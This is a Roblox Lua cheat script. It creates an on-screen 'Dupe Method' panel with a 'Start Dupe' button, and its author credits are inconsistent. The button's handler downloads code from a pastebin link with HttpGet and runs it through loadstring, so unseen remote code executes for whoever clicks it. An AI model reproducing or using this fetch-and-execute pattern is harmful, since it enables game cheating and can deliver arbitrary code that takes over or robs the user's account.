local ScreenGui = Instance.new("ScreenGui")
local main = Instance.new("Frame")
local DupedMethodMadeByPr4ston = Instance.new("TextLabel")
local _10Minutes = Instance.new("TextButton")
local _20Minutes = Instance.new("TextButton")
local _30Minutes = Instance.new("TextButton")

--Properties:

ScreenGui.Parent = game.CoreGui

main.Name = "main"
main.Parent = ScreenGui
main.BackgroundColor3 = Color3.fromRGB(42, 42, 42)
main.Position = UDim2.new(0.0659062043, 0, 0.186878726, 0)
main.Size = UDim2.new(0, 260, 0, 260)
main.Active = true
main.Draggable = true

DupedMethodMadeByPr4ston.Name = "Dupe Method | Made By Shаdow#1427"
DupedMethodMadeByPr4ston.Parent = main
DupedMethodMadeByPr4ston.BackgroundColor3 = Color3.fromRGB(52, 52, 52)
DupedMethodMadeByPr4ston.Position = UDim2.new(0.399116307, 0, 0.33975932, 0)
DupedMethodMadeByPr4ston.Size = UDim2.new(0, 260, 0, 44)
DupedMethodMadeByPr4ston.Font = Enum.Font.SourceSans
DupedMethodMadeByPr4ston.Text = "Dupe Method | Made By Shаdow#1427"
DupedMethodMadeByPr4ston.TextColor3 = Color3.fromRGB(15, 15, 15)
DupedMethodMadeByPr4ston.TextSize = 19.000

_30Minutes.Name = "30 Minutes"
_30Minutes.Parent = main
_30Minutes.BackgroundColor3 = Color3.fromRGB(62, 62, 62)
_30Minutes.Position = UDim2.new(0.115384616, 0, 0.311538458, 0)
_30Minutes.Size = UDim2.new(0, 200, 0, 136)
_30Minutes.Font = Enum.Font.SourceSans
_30Minutes.Text = "Start Dupe"
_30Minutes.TextColor3 = Color3.fromRGB(15, 15, 15)
_30Minutes.TextSize = 47.000
_30Minutes.MouseButton1Down:connect(function()
	loadstring(game:HttpGet('https://pastebin.com/Tmb7NGFE'))()
end)
